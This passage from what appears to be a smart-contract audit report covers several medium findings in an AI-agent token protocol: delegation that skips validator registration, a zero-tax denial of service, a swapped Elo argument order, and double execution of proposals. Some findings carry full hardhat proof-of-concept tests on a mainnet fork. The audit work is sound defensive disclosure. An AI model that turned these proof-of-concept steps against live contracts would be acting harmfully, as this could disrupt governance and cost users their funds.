const PROPOSAL_THRESHOLD = parseEther("50000"); // 50k
const MATURITY_SCORE = toBeHex(2000, 32); // 20%
const IP_SHARE = 1000; // 10%
const genesisInput = {
name: "Jessica",
symbol: "JSC",
tokenURI: "http://jessica",
daoName: "Jessica DAO",
cores: [0, 1, 2],
tbaSalt:
"0xa7647ac9429fdce477ebd9a95510385b756c757c26149e740abbab0ad1be2f16",
tbaImplementation: process.env.TBA_IMPLEMENTATION || ethers.ZeroAddress,
daoVotingPeriod: 600,
daoThreshold: 1000000000000000000000n,
};
const getAccounts = async () => {
const [deployer, ipVault, founder, poorMan, trader, treasury, randomAddr] = await ethers.getSigners();
// Fund all accounts with ETH for gas (10 ETH each)
const fundAccounts = [deployer, ipVault, founder, poorMan, trader, treasury];
for (const account of fundAccounts) {
await setBalance(account.address, parseEther("10"));
}
return { deployer, ipVault, founder, poorMan, trader, treasury, randomAddr };
};
async function deployBaseContracts() {
const { deployer, ipVault, treasury } = await getAccounts();
// Setting up environment variables if not present in the actual .env
// This is for testing purposes only
if (!process.env.TBA_IMPLEMENTATION) process.env.TBA_IMPLEMENTATION = ethers.ZeroAddress;
if (!process.env.DATASET_SHARES) process.env.DATASET_SHARES = "1000"; // 10%
if (!process.env.UNISWAP_ROUTER) process.env.UNISWAP_ROUTER = "0x8aEF2b5C33686F8621A17B9Aaff079E7d8D673f9"; // Base mainnet Uniswap router
if (!process.env.AGENT_TOKEN_LIMIT) process.env.AGENT_TOKEN_LIMIT = parseEther("10000000").toString(); // 10M
if (!process.env.AGENT_TOKEN_LP_SUPPLY) process.env.AGENT_TOKEN_LP_SUPPLY = parseEther("5000000").toString(); // 5M
if (!process.env.AGENT_TOKEN_VAULT_SUPPLY) process.env.AGENT_TOKEN_VAULT_SUPPLY = parseEther("2000000").toString(); // 2M
if (!process.env.BOT_PROTECTION) process.env.BOT_PROTECTION = "100"; // 1%
if (!process.env.TAX) process.env.TAX = "500"; // 5%
if (!process.env.SWAP_THRESHOLD) process.env.SWAP_THRESHOLD = parseEther("10").toString(); // 10 tokens
console.log("Deploying VirtualToken...");
const virtualToken = await ethers.deployContract(
"VirtualToken",
[PROPOSAL_THRESHOLD, deployer.address],
{}
);
await virtualToken.waitForDeployment();
console.log(`VirtualToken deployed at ${virtualToken.target}`);
console.log("Deploying ERC6551Registry Registry");
const tbaRegistry = await ethers.deployContract("ERC6551Registry");
await tbaRegistry.waitForDeployment();
console.log("Deployed ERC6551Registry Registry");
console.log("Deploying AgentNftV2...");
const AgentNft = await ethers.getContractFactory("AgentNftV2");
const agentNft = await upgrades.deployProxy(AgentNft, [deployer.address]);
console.log(`AgentNftV2 deployed at ${agentNft.target}`);
console.log("Deploying ContributionNft...");
const contribution = await upgrades.deployProxy(
await ethers.getContractFactory("ContributionNft"),
[agentNft.target],
{}
);
console.log(`ContributionNft deployed at ${contribution.target}`);
console.log("Deploying ServiceNft...");
const service = await upgrades.deployProxy(
await ethers.getContractFactory("ServiceNft"),
[agentNft.target, contribution.target, process.env.DATASET_SHARES],
{}
);
console.log(`ServiceNft deployed at ${service.target}`);
await agentNft.setContributionService(contribution.target, service.target);
console.log("Set contribution and service on AgentNft");
// Implementation contracts
console.log("Deploying AgentToken...");
const agentToken = await ethers.deployContract("AgentToken");
await agentToken.waitForDeployment();
console.log(`AgentToken deployed at ${agentToken.target}`);
console.log("Deploying AgentDAO...");
const agentDAO = await ethers.deployContract("AgentDAO");
await agentDAO.waitForDeployment();
console.log(`AgentDAO deployed at ${agentDAO.target}`);
console.log("Deploying AgentVeToken...");
const agentVeToken = await ethers.deployContract("AgentVeToken");
await agentVeToken.waitForDeployment();
console.log(`AgentVeToken deployed at ${agentVeToken.target}`);
console.log("Deploying AgentFactoryV2...");
const agentFactory = await upgrades.deployProxy(
await ethers.getContractFactory("AgentFactoryV2"),
[
agentToken.target,
agentVeToken.target,
agentDAO.target,
tbaRegistry.target,
virtualToken.target,
agentNft.target,
PROPOSAL_THRESHOLD,
deployer.address,
]
);
await agentFactory.waitForDeployment();
console.log(`AgentFactoryV2 deployed at ${agentFactory.target}`);
await agentNft.grantRole(await agentNft.MINTER_ROLE(), agentFactory.target);
console.log("Granted MINTER_ROLE to AgentFactory");
console.log("Deploying Minter...");
const minter = await upgrades.deployProxy(
await ethers.getContractFactory("Minter"),
[
service.target,
contribution.target,
agentNft.target,
1e12,
20,
ipVault.address,
agentFactory.target,
deployer.address,
1e10,
]
);
await minter.waitForDeployment();
console.log(`Minter deployed at ${minter.target}`);
console.log("Setting parameters on AgentFactory...");
await agentFactory.setMaturityDuration(86400 * 365 * 10); // 10years
await agentFactory.setUniswapRouter(process.env.UNISWAP_ROUTER);
await agentFactory.setTokenAdmin(deployer.address);
await agentFactory.setTokenSupplyParams(
process.env.AGENT_TOKEN_LIMIT,
process.env.AGENT_TOKEN_LP_SUPPLY,
process.env.AGENT_TOKEN_VAULT_SUPPLY,
process.env.AGENT_TOKEN_LIMIT,
process.env.AGENT_TOKEN_LIMIT,
process.env.BOT_PROTECTION,
minter.target
);
await agentFactory.setTokenTaxParams(
process.env.TAX,
process.env.TAX,
process.env.SWAP_THRESHOLD,
treasury.address
);
console.log("AgentFactory parameters set");
return { virtualToken, agentFactory, agentNft, minter, tbaRegistry };
}
async function deployWithApplication() {
const base = await deployBaseContracts();
const { agentFactory, virtualToken, tbaRegistry } = base;
const { founder } = await getAccounts();
// Prepare tokens for proposal
console.log("Minting VirtualToken for founder...");
await virtualToken.mint(founder.address, PROPOSAL_THRESHOLD);
await virtualToken
.connect(founder)
.approve(agentFactory.target, PROPOSAL_THRESHOLD);
console.log("Proposing agent...");
const tx = await agentFactory
.connect(founder)
.proposeAgent(
genesisInput.name,
genesisInput.symbol,
genesisInput.tokenURI,
genesisInput.cores,
genesisInput.tbaSalt,
tbaRegistry.target,
genesisInput.daoVotingPeriod,
genesisInput.daoThreshold
);
await tx.wait();
const filter = agentFactory.filters.NewApplication;
const events = await agentFactory.queryFilter(filter, -1);
const event = events[0];
const { id } = event.args;
console.log(`Agent application created with ID: ${id}`);
return { applicationId: id, ...base };
}
async function deployWithAgent() {
const base = await deployWithApplication();
const { agentFactory, applicationId } = base;
const { founder } = await getAccounts();
console.log("Executing application...");
await agentFactory
.connect(founder)
.executeApplication(applicationId, false);
const factoryFilter = agentFactory.filters.NewPersona;
const factoryEvents = await agentFactory.queryFilter(factoryFilter, -1);
const factoryEvent = factoryEvents[0];
const { virtualId, token, veToken, dao, tba, lp } = await factoryEvent.args;
console.log(`Agent created with virtualId: ${virtualId}`);
return {
...base,
agent: {
virtualId,
token,
veToken,
dao,
tba,
lp,
},
};
}
before(async function () {
// Increase timeout for all tests
this.timeout(60000);
});
it("Removed liquidity pair still accrues taxes", async function () {
const { agent, agentNft, virtualToken} = await loadFixture(
deployWithAgent
);
const { trader, poorMan, founder, randomAddr, deployer } = await getAccounts();
const router = await ethers.getContractAt(
"IUniswapV2Router02",
process.env.UNISWAP_ROUTER
);
const agentToken = await ethers.getContractAt("AgentToken", agent.token);
const uniswapV2Pair = await agentToken.uniswapV2Pair();
console.log("uniswapV2Pair: ", uniswapV2Pair);
await agentToken.connect(deployer).removeLiquidityPool(uniswapV2Pair);
// Should still assert isLiquidityPool as true
expect(await agentToken.isLiquidityPool(uniswapV2Pair)).to.be.eq(true);
});
});[M-14] VotesUpgradeable::delegate bypasses the addValidator call, leads to a non-validator holding voting power along with loss of rewards
Submitted by YouCrossTheLineAlfie
Finding description
The AgentVeToken::stake allows users to stake their tokens in exchange of the power to delegate voting power to a delegatee.
This delegatee can now take part in the governance process via AgentDAO contract.
These delegates are rewarded via AgentReward contract, this is performed via storing the validators during stake.
function stake(uint256 amount, address receiver, address delegatee) public {
// . . . Rest of the code . . .
if (totalSupply() == 0) {
initialLock = amount;
}
registry.addValidator(virtualId, delegatee); <<@ -- // Validators are added to the registry every time a stake happens.
IERC20(assetToken).safeTransferFrom(sender, address(this), amount);
_mint(receiver, amount);
_delegate(receiver, delegatee);
_balanceCheckpoints[receiver].push(clock(), SafeCast.toUint208(balanceOf(receiver)));
}This registry is used inside the AgentRewardV2 and AgentRewardV3 contract via _distributeValidatorRewards and claimAllValidatorRewards respectively. However, there’s a loophole which allows stakers (which includes the founder) to delegate their votes to someone else who is not even a validator. This can be done via the VotesUpgradeable::delegate, the VotesUpgradeable is deeply nested, the way to reach this file is shown below:
(consider -> as inherits keyword)
AgentVeToken -> ERC20Votes -> ERC20VotesUpgradeable -> VotesUpgradeable /**
* @dev Delegates votes from the sender to `delegatee`.
*/
function delegate(address delegatee) public virtual {
address account = _msgSender();
_delegate(account, delegatee);
}As we can observe, this functionality by-passes the AgentNftV2::addValidator call; hence, allowing a non-validator to be involved in the governance process and at the same time, rewards would lost for both the staker and delegatee.
Impact
- Allows delegation to a non-validator (breaking core functionality).
- No validator would be added here to the registry upon
VotesUpgradeable::delegatecall. - No party here earns any rewards via
AgentRewardcontracts.
Recommended mitigation steps
Changing delegates via AgentVeToken::stake is sub-optimal, so the recommended solution would be to override the VotesUpgradeable::delegate and modify it to add the addValidator call:
function delegate(address delegatee) public override {
address account = _msgSender();
IAgentNft registry = IAgentNft(agentNft);
uint256 virtualId = registry.stakingTokenToVirtualId(address(this));
registry.addValidator(virtualId, delegatee);
_delegate(account, delegatee);
}Proof of Concept
The test case below was ran using a base mainnet fork, please add the same to the hardhat.config.js file. The hardhat version wasn’t supporting the base mainnet fork, so it had to be upgraded:
"hardhat": "^2.23.0",Add the following values to the .env file (along with private keys):
### Genesis DAO settings
GENESIS_VOTING_DELAY=0
GENESIS_VOTING_PERIOD=900
GENESIS_PROPOSAL_THRESHOLD=0
### Virtual DAO settings
PROTOCOL_VOTING_DELAY=0
PROTOCOL_VOTING_PERIOD=900
PROTOCOL_PROPOSAL_THRESHOLD=1000000000000000000000000
PROTOCOL_QUORUM_NUMERATOR=1000
### Other settings
CHAIN_ID=84532
VIRTUAL_APPLICATION_THRESHOLD=50000000000000000000 # 50
VIRTUAL_APPLICATION_THRESHOLD_VIP=125000000000000000000 #125 $V
MATURITY_DURATION=1000 # number of blocks until initial virtual staker can withdraw (1000 blocks = ~33 minutes)
### AgentToken settings
AGENT_TOKEN_SUPPLY=1000000000 # 1B supply
AGENT_TOKEN_LIMIT_TRX=100000 # 100k max token per txn
AGENT_TOKEN_LIMIT_WALLET=1000000 # 1M token per wallet
AGENT_TOKEN_LP_SUPPLY=1000000000 # 1B LP tokens
AGENT_TOKEN_LIMIT=1000000000
AGENT_TOKEN_VAULT_SUPPLY=0 #
BOT_PROTECTION=3600 # 1hr
TAX=100 # 3%
BONDING_TAX=1
SWAP_THRESHOLD=1 # 0.00001% of total supply
### VOTING_TOKEN=
TBA_REGISTRY=
### Reward settings
PARENT_SHARES=2000 # 20%
PROTOCOL_SHARES=1000 # 10%
CONTRIBUTOR_SHARES=5000 # 50%
STAKER_SHARES=9000 # 90%
REWARD_STAKE_THRESHOLD=2000000000000000000 # 2 eth
DATASET_SHARES=7000 # 70%
### TAX MANAGER
MIN_SWAP_THRESHOLD=100000000000000000 # 0.1
MAX_SWAP_THRESHOLD=1000000000000000000000 # 1000
UNISWAP_ROUTER=0x4752ba5dbc23f44d87826276bf6fd6b1c372ad24Create a file called PoC.js and add the following test case inside the /tests folder and run npx hardhat test --grep "Delegate a non-validator":
const { parseEther, toBeHex, formatEther } = require("ethers/utils");
const { expect } = require("chai");
const {
loadFixture,
mine,
impersonateAccount,
setBalance,
} = require("@nomicfoundation/hardhat-toolbox/network-helpers");
const { ethers } = require("hardhat");
describe("AgentFactory", () => {
const PROPOSAL_THRESHOLD = parseEther("50000"); // 50k
const MATURITY_SCORE = toBeHex(2000, 32); // 20%
const IP_SHARE = 1000; // 10%
const genesisInput = {
name: "Jessica",
symbol: "JSC",
tokenURI: "http://jessica",
daoName: "Jessica DAO",
cores: [0, 1, 2],
tbaSalt:
"0xa7647ac9429fdce477ebd9a95510385b756c757c26149e740abbab0ad1be2f16",
tbaImplementation: process.env.TBA_IMPLEMENTATION || ethers.ZeroAddress,
daoVotingPeriod: 600,
daoThreshold: 1000000000000000000000n,
};
const getAccounts = async () => {
const [deployer, ipVault, founder, poorMan, trader, treasury, randomAddr] = await ethers.getSigners();
// Fund all accounts with ETH for gas (10 ETH each)
const fundAccounts = [deployer, ipVault, founder, poorMan, trader, treasury];
for (const account of fundAccounts) {
await setBalance(account.address, parseEther("10"));
}
return { deployer, ipVault, founder, poorMan, trader, treasury, randomAddr };
};
async function deployBaseContracts() {
const { deployer, ipVault, treasury } = await getAccounts();
// Setting up environment variables if not present in the actual .env
// This is for testing purposes only
if (!process.env.TBA_IMPLEMENTATION) process.env.TBA_IMPLEMENTATION = ethers.ZeroAddress;
if (!process.env.DATASET_SHARES) process.env.DATASET_SHARES = "1000"; // 10%
if (!process.env.UNISWAP_ROUTER) process.env.UNISWAP_ROUTER = "0x8aEF2b5C33686F8621A17B9Aaff079E7d8D673f9"; // Base mainnet Uniswap router
if (!process.env.AGENT_TOKEN_LIMIT) process.env.AGENT_TOKEN_LIMIT = parseEther("10000000").toString(); // 10M
if (!process.env.AGENT_TOKEN_LP_SUPPLY) process.env.AGENT_TOKEN_LP_SUPPLY = parseEther("5000000").toString(); // 5M
if (!process.env.AGENT_TOKEN_VAULT_SUPPLY) process.env.AGENT_TOKEN_VAULT_SUPPLY = parseEther("2000000").toString(); // 2M
if (!process.env.BOT_PROTECTION) process.env.BOT_PROTECTION = "100"; // 1%
if (!process.env.TAX) process.env.TAX = "500"; // 5%
if (!process.env.SWAP_THRESHOLD) process.env.SWAP_THRESHOLD = parseEther("10").toString(); // 10 tokens
console.log("Deploying VirtualToken...");
const virtualToken = await ethers.deployContract(
"VirtualToken",
[PROPOSAL_THRESHOLD, deployer.address],
{}
);
await virtualToken.waitForDeployment();
console.log(`VirtualToken deployed at ${virtualToken.target}`);
console.log("Deploying ERC6551Registry Registry");
const tbaRegistry = await ethers.deployContract("ERC6551Registry");
await tbaRegistry.waitForDeployment();
console.log("Deployed ERC6551Registry Registry");
console.log("Deploying AgentNftV2...");
const AgentNft = await ethers.getContractFactory("AgentNftV2");
const agentNft = await upgrades.deployProxy(AgentNft, [deployer.address]);
console.log(`AgentNftV2 deployed at ${agentNft.target}`);
console.log("Deploying ContributionNft...");
const contribution = await upgrades.deployProxy(
await ethers.getContractFactory("ContributionNft"),
[agentNft.target],
{}
);
console.log(`ContributionNft deployed at ${contribution.target}`);
console.log("Deploying ServiceNft...");
const service = await upgrades.deployProxy(
await ethers.getContractFactory("ServiceNft"),
[agentNft.target, contribution.target, process.env.DATASET_SHARES],
{}
);
console.log(`ServiceNft deployed at ${service.target}`);
await agentNft.setContributionService(contribution.target, service.target);
console.log("Set contribution and service on AgentNft");
// Implementation contracts
console.log("Deploying AgentToken...");
const agentToken = await ethers.deployContract("AgentToken");
await agentToken.waitForDeployment();
console.log(`AgentToken deployed at ${agentToken.target}`);
console.log("Deploying AgentDAO...");
const agentDAO = await ethers.deployContract("AgentDAO");
await agentDAO.waitForDeployment();
console.log(`AgentDAO deployed at ${agentDAO.target}`);
console.log("Deploying AgentVeToken...");
const agentVeToken = await ethers.deployContract("AgentVeToken");
await agentVeToken.waitForDeployment();
console.log(`AgentVeToken deployed at ${agentVeToken.target}`);
console.log("Deploying AgentFactoryV2...");
const agentFactory = await upgrades.deployProxy(
await ethers.getContractFactory("AgentFactoryV2"),
[
agentToken.target,
agentVeToken.target,
agentDAO.target,
tbaRegistry.target,
virtualToken.target,
agentNft.target,
PROPOSAL_THRESHOLD,
deployer.address,
]
);
await agentFactory.waitForDeployment();
console.log(`AgentFactoryV2 deployed at ${agentFactory.target}`);
await agentNft.grantRole(await agentNft.MINTER_ROLE(), agentFactory.target);
console.log("Granted MINTER_ROLE to AgentFactory");
console.log("Deploying Minter...");
const minter = await upgrades.deployProxy(
await ethers.getContractFactory("Minter"),
[
service.target,
contribution.target,
agentNft.target,
1e12,
20,
ipVault.address,
agentFactory.target,
deployer.address,
1e10,
]
);
await minter.waitForDeployment();
console.log(`Minter deployed at ${minter.target}`);
console.log("Setting parameters on AgentFactory...");
await agentFactory.setMaturityDuration(86400 * 365 * 10); // 10years
await agentFactory.setUniswapRouter(process.env.UNISWAP_ROUTER);
await agentFactory.setTokenAdmin(deployer.address);
await agentFactory.setTokenSupplyParams(
process.env.AGENT_TOKEN_LIMIT,
process.env.AGENT_TOKEN_LP_SUPPLY,
process.env.AGENT_TOKEN_VAULT_SUPPLY,
process.env.AGENT_TOKEN_LIMIT,
process.env.AGENT_TOKEN_LIMIT,
process.env.BOT_PROTECTION,
minter.target
);
await agentFactory.setTokenTaxParams(
process.env.TAX,
process.env.TAX,
process.env.SWAP_THRESHOLD,
treasury.address
);
console.log("AgentFactory parameters set");
return { virtualToken, agentFactory, agentNft, minter, tbaRegistry };
}
async function deployWithApplication() {
const base = await deployBaseContracts();
const { agentFactory, virtualToken, tbaRegistry } = base;
const { founder } = await getAccounts();
// Prepare tokens for proposal
console.log("Minting VirtualToken for founder...");
await virtualToken.mint(founder.address, PROPOSAL_THRESHOLD);
await virtualToken
.connect(founder)
.approve(agentFactory.target, PROPOSAL_THRESHOLD);
console.log("Proposing agent...");
const tx = await agentFactory
.connect(founder)
.proposeAgent(
genesisInput.name,
genesisInput.symbol,
genesisInput.tokenURI,
genesisInput.cores,
genesisInput.tbaSalt,
tbaRegistry.target,
genesisInput.daoVotingPeriod,
genesisInput.daoThreshold
);
await tx.wait();
const filter = agentFactory.filters.NewApplication;
const events = await agentFactory.queryFilter(filter, -1);
const event = events[0];
const { id } = event.args;
console.log(`Agent application created with ID: ${id}`);
return { applicationId: id, ...base };
}
async function deployWithAgent() {
const base = await deployWithApplication();
const { agentFactory, applicationId } = base;
const { founder } = await getAccounts();
console.log("Executing application...");
await agentFactory
.connect(founder)
.executeApplication(applicationId, false);
const factoryFilter = agentFactory.filters.NewPersona;
const factoryEvents = await agentFactory.queryFilter(factoryFilter, -1);
const factoryEvent = factoryEvents[0];
const { virtualId, token, veToken, dao, tba, lp } = await factoryEvent.args;
console.log(`Agent created with virtualId: ${virtualId}`);
return {
...base,
agent: {
virtualId,
token,
veToken,
dao,
tba,
lp,
},
};
}
before(async function () {
// Increase timeout for all tests
this.timeout(60000);
});
it("Delegate a non-validator", async function () {
// Need to provide LP first
const { agent, agentNft, virtualToken } = await loadFixture(
deployWithAgent
);
const { trader, poorMan, founder, randomAddr } = await getAccounts();
const router = await ethers.getContractAt(
"IUniswapV2Router02",
process.env.UNISWAP_ROUTER
);
const agentToken = await ethers.getContractAt("AgentToken", agent.token);
// Buy tokens
const amountToBuy = parseEther("10000000");
const capital = parseEther("200000000");
await virtualToken.mint(trader.address, capital);
await virtualToken
.connect(trader)
.approve(process.env.UNISWAP_ROUTER, capital);
await router
.connect(trader)
.swapTokensForExactTokens(
amountToBuy,
capital,
[virtualToken.target, agent.token],
trader.address,
Math.floor(new Date().getTime() / 1000 + 600000)
);
////
// Start providing liquidity
const lpToken = await ethers.getContractAt("ERC20", agent.lp);
const veToken = await ethers.getContractAt("AgentVeToken", agent.veToken);
await veToken.connect(founder).setCanStake(true);
expect(await lpToken.balanceOf(trader.address)).to.be.equal(0n);
await agentToken
.connect(trader)
.approve(process.env.UNISWAP_ROUTER, parseEther("10000000"));
await virtualToken
.connect(trader)
.approve(process.env.UNISWAP_ROUTER, parseEther("10000000"));
await router
.connect(trader)
.addLiquidity(
agentToken.target,
virtualToken.target,
await agentToken.balanceOf(trader.address),
await virtualToken.balanceOf(trader.address),
0,
0,
trader.address,
Math.floor(new Date().getTime() / 1000 + 6000)
);
/////////////////
// Staking, and able to delegate to anyone
await lpToken.connect(trader).approve(agent.veToken, parseEther("100"));
await expect(
veToken
.connect(trader)
.stake(parseEther("10"), trader.address, poorMan.address)
).to.be.not.reverted;
// Delegate to someone else without adding to the addValidator
await veToken.connect(trader).delegate(randomAddr);
// Assert poorMan as a validator
expect(await agentNft.isValidator(agent.virtualId , poorMan.address)).to.be.eq(true);
// Assert RandomAddress as not a validator
expect(await agentNft.isValidator(agent.virtualId , randomAddr.address)).to.be.eq(false);
});
});[M-15] If FFactory::buyTax and / or FFactory::sellTax is set to 0, buy / sell would revert
Submitted by YouCrossTheLineAlfie, also found by NHristov
Finding description
The FFactory::setTaxParams can be called by the admin to change the buyTax and sellTax.
// FFactory.sol
function setTaxParams(address newVault_, uint256 buyTax_, uint256 sellTax_) public onlyRole(ADMIN_ROLE) {
require(newVault_ != address(0), "Zero addresses are not allowed.");
taxVault = newVault_;
buyTax = buyTax_;
sellTax = sellTax_;
}This is used inside the FRouter::buy and FRouter::sell to levy fees.
// FRouter.sol
function buy(
uint256 amountIn,
address tokenAddress,
address to
) public onlyRole(EXECUTOR_ROLE) nonReentrant returns (uint256, uint256) {
// . . . Rest of the code . . .
uint fee = factory.buyTax();
uint256 txFee = (fee * amountIn) / 100;
address feeTo = factory.taxVault();
uint256 amount = amountIn - txFee;
IERC20(assetToken).safeTransferFrom(to, pair, amount);
IERC20(assetToken).safeTransferFrom(to, feeTo, txFee); <<@ -- // Fee sent to taxManager
uint256 amountOut = getAmountsOut(tokenAddress, assetToken, amount);
IFPair(pair).transferTo(to, amountOut);
IFPair(pair).swap(0, amountOut, amount, 0);
if (feeTo == taxManager) {
IBondingTax(taxManager).swapForAsset(); <<@ -- // Swap for Asset call
}
return (amount, amountOut);
} // FRouter.sol
function sell(
uint256 amountIn,
address tokenAddress,
address to
) public nonReentrant onlyRole(EXECUTOR_ROLE) returns (uint256, uint256) {
// . . . Rest of the code . . .
uint fee = factory.sellTax();
uint256 txFee = (fee * amountOut) / 100;
uint256 amount = amountOut - txFee;
address feeTo = factory.taxVault();
pair.transferAsset(to, amount);
pair.transferAsset(feeTo, txFee); <<@ -- // Fee sent to taxManager
pair.swap(amountIn, 0, 0, amountOut);
if (feeTo == taxManager) {
IBondingTax(taxManager).swapForAsset(); <<@ -- // Swap for Asset call
}
return (amountIn, amountOut);
}However, when we have a closer look at the BondingTax::swapForAsset function, we can observe that it reverts if the balance of the contract is 0:
// BondingTax.sol
function swapForAsset() public onlyBondingRouter returns (bool, uint256) {
uint256 amount = IERC20(taxToken).balanceOf(address(this));
require(amount > 0, "Nothing to be swapped"); <<@ -- // Reverts if balance is 0
if (amount < minSwapThreshold) {
return (false, 0);
}
if (amount > maxSwapThreshold) {
amount = maxSwapThreshold;
}Hence, if buy and/or sell tax is set to 0 via FFactory::setTaxParams, there can be a case where the balance of taxManager becomes 0.
Also this is not unlikely, and can be very easily manipulated by an attacker by simply donating exactly to match maxSwapThreshold funds. Setting fees to 0 is a very valid and intuitive value to set.
Impact
Failed buy and sell swaps will lead to DoS.
Recommended mitigation steps
It is recommended to simply return with (false, 0) instead of reverting:
// BondingTax.sol
function swapForAsset() public onlyBondingRouter returns (bool, uint256) {
uint256 amount = IERC20(taxToken).balanceOf(address(this));
- require(amount > 0, "Nothing to be swapped");
- if (amount < minSwapThreshold) {
+ if (amount < minSwapThreshold || amount == 0) {
return (false, 0);
}
if (amount > maxSwapThreshold) {
amount = maxSwapThreshold;
}[M-16] Elo calculation error
Submitted by levi_104, also found by axelot, gmh5225, and io10
Finding description and impact
Here, the order of eloB and eloA is reversed, and subsequently, eloA and eloB are calculated with addition and subtraction based on the value of negative, leading to a final calculation error.
function battleElo(uint256 currentRating, uint8[] memory battles) public view returns (uint256) {
uint256 eloA = 1000;
uint256 eloB = 1000;
for (uint256 i = 0; i < battles.length; i++) {
uint256 result = mapBattleResultToGameResult(battles[i]);
(uint256 change, bool negative) = Elo.ratingChange(eloB, eloA, result, k);
change = _roundUp(change, 100);
if (negative) {
eloA -= change;
eloB += change;
} else {
eloA += change;
eloB -= change;
}
}
return currentRating + eloA - 1000;
}In the ELO system:
ratingAusually represents Player A’s rating, and score is Player A’s score.ratingBis the opponent (Player B)’s rating.
But in this code:
eloAis regarded as Player A’s rating.eloBis regarded as Player B’s rating.
However, when calling Elo.ratingChange(eloB, eloA, result, k), it means:
ratingA = eloB(Player B’s rating).ratingB = eloA(Player A’s rating).- score is the score of
ratingA(eloB).
This is unexpected. Usually, Elo.ratingChange(eloA, eloB, result, k) should be used, because:
eloAis Player A’s rating, and result is Player A’s battle outcome.eloBis Player B’s rating.
Due to the wrong parameter order, Elo.ratingChange calculates the change and direction of eloB (as ratingA), not of eloA.
/// @notice Calculates the change in ELO rating, after a given outcome.
/// @param ratingA the ELO rating of the player A
/// @param ratingB the ELO rating of the player B
/// @param score the score of the player A, scaled by 100. 100 = win, 50 = draw, 0 = loss
/// @param kFactor the k-factor or development multiplier used to calculate the change in ELO rating. 20 is the typical value
/// @return change the change in ELO rating of player A, with 2 decimals of precision. 1501 = 15.01 ELO change
/// @return negative the directional change of player A's ELO. Opposite sign for player B
function ratingChange(
uint256 ratingA,
uint256 ratingB,
uint256 score,
uint256 kFactor
) internal pure returns (uint256 change, bool negative) {Recommended mitigation steps
- Elo.ratingChange(eloB, eloA, result, k);
+ Elo.ratingChange(eloA, eloB, result, k);[M-17] VirtualGenesisDAO.sol:earlyExecute() proposals can be executed two times
Submitted by Fitro
Finding description and impact
earlyExecute() allows a proposal to be executed earlier but can only be called by an account with the EXECUTOR_ROLE.
function earlyExecute(uint256 proposalId) public payable onlyRole(EXECUTOR_ROLE) returns (uint256) {
(
address[] memory targets,
uint256[] memory values,
bytes[] memory calldatas,
bytes32 descriptionHash
) = proposalDetails(proposalId);
require(
state(proposalId) == ProposalState.Active &&
_voteSucceeded(proposalId) &&
_quorumReached(proposalId) &&
!_earlyExecutions[proposalId],
"Proposal not ready for early execution"
);
// avoid reentrancy
_earlyExecutions[proposalId] = true;
_executeOperations(proposalId, targets, values, calldatas, descriptionHash);
emit ProposalExecuted(proposalId);
return proposalId;
}As you can see, it uses the _earlyExecutions mapping to prevent the proposal from being executed a second time. The problem is that _executeOperations() does not set the executed flag to true, as can be seen in the comments of the function.
/**
* NOTE: Calling this function directly will NOT check the current state of the proposal, set the executed flag to
* true or emit the `ProposalExecuted` event. Executing a proposal should be done using {execute} or {_execute}.
*/
function _executeOperations(
uint256 /* proposalId */,
address[] memory targets,
uint256[] memory values,
bytes[] memory calldatas,
bytes32 /*descriptionHash*/
) internal virtual {
for (uint256 i = 0; i < targets.length; ++i) {
(bool success, bytes memory returndata) = targets[i].call{value: values[i]}(calldatas[i]);
Address.verifyCallResult(success, returndata);
}
}This is problematic because a user can call execute() from the Governor.sol abstract contract to execute the proposal again, since _proposals[proposalId].executed is not set to true, as shown in the execute().
function execute(
address[] memory targets,
uint256[] memory values,
bytes[] memory calldatas,
bytes32 descriptionHash
) public payable virtual returns (uint256) {
uint256 proposalId = hashProposal(targets, values, calldatas, descriptionHash);
_validateStateBitmap(
proposalId,
_encodeStateBitmap(ProposalState.Succeeded) | _encodeStateBitmap(ProposalState.Queued)
);
// mark as executed before calls to avoid reentrancy
@> _proposals[proposalId].executed = true;
///code...As shown, executed is set to true to prevent a proposal from being executed more than once. However, when _executeOperations() is used directly, this flag is not set. Since the execute() function is public and not overridden to include access control, any user can call it, allowing the proposal to be executed a second time.
Recommended mitigation steps
To resolve the issue, replace the call to _executeOperations() with a call to execute().
function earlyExecute(uint256 proposalId) public payable onlyRole(EXECUTOR_ROLE) returns (uint256) {
(
address[] memory targets,
uint256[] memory values,
bytes[] memory calldatas,
bytes32 descriptionHash
) = proposalDetails(proposalId);
require(
state(proposalId) == ProposalState.Active &&
_voteSucceeded(proposalId) &&
_quorumReached(proposalId) &&
!_earlyExecutions[proposalId],
"Proposal not ready for early execution"
);
// avoid reentrancy
_earlyExecutions[proposalId] = true;
- _executeOperations(proposalId, targets, values, calldatas, descriptionHash);
+ execute(targets, values, calldatas, descriptionHash);
emit ProposalExecuted(proposalId);
return proposalId;
}[M-18] Genesis.sol:onGenesisSuccess() users may lose their unclaimed agentTokens if a second launch occurs before they’ve claimed their rewards from the first
Submitted by Fitro, also found by dreamcoder
Finding description and impact
onGenesisSuccess() is used to refund virtual tokens to users and to account for the agent tokens earned by participating in a successful genesis event.
function onGenesisSuccess(
address[] calldata refundVirtualsTokenUserAddresses,
uint256[] calldata refundVirtualsTokenUserAmounts,
address[] calldata distributeAgentTokenUserAddresses,
uint256[] calldata distributeAgentTokenUserAmounts,
address creator
) external onlyRole(FACTORY_ROLE) nonReentrant whenNotCancelled whenNotFailed whenEnded returns (address) {
//code...
// Check if launch has been called before
bool isFirstLaunch = agentTokenAddress == address(0);
// Calculate required balance based on whether this is first launch
uint256 requiredVirtualsBalance = isFirstLaunch ? totalRefundAmount + reserveAmount :
totalRefundAmount;
// Check if contract has enough virtuals balance
require(
IERC20(virtualTokenAddress).balanceOf(address(this)) >= requiredVirtualsBalance,
"Insufficient Virtual Token balance"
);
// Only do launch related operations if this is first launch
if (isFirstLaunch) {
// grant allowance to agentFactoryAddress for launch
IERC20(virtualTokenAddress).approve(agentFactoryAddress, reserveAmount);
// Call initFromBondingCurve and executeBondingCurveApplication
uint256 id = IAgentFactoryV3(agentFactoryAddress).initFromBondingCurve(
string.concat(genesisName, " by Virtuals"),
genesisTicker,
genesisCores,
tbaSalt,
tbaImplementation,
daoVotingPeriod,
daoThreshold,
reserveAmount,
creator
);
address agentToken = IAgentFactoryV3(agentFactoryAddress).executeBondingCurveApplication(
id,
agentTokenTotalSupply,
agentTokenLpSupply,
address(this) // vault
);
require(agentToken != address(0), "Agent token creation failed");
// Store the created agent token address
agentTokenAddress = agentToken;
}
// Calculate total distribution amount
uint256 totalDistributionAmount = 0;
for (uint256 i = 0; i < distributeAgentTokenUserAmounts.length; i++) {
totalDistributionAmount += distributeAgentTokenUserAmounts[i];
}
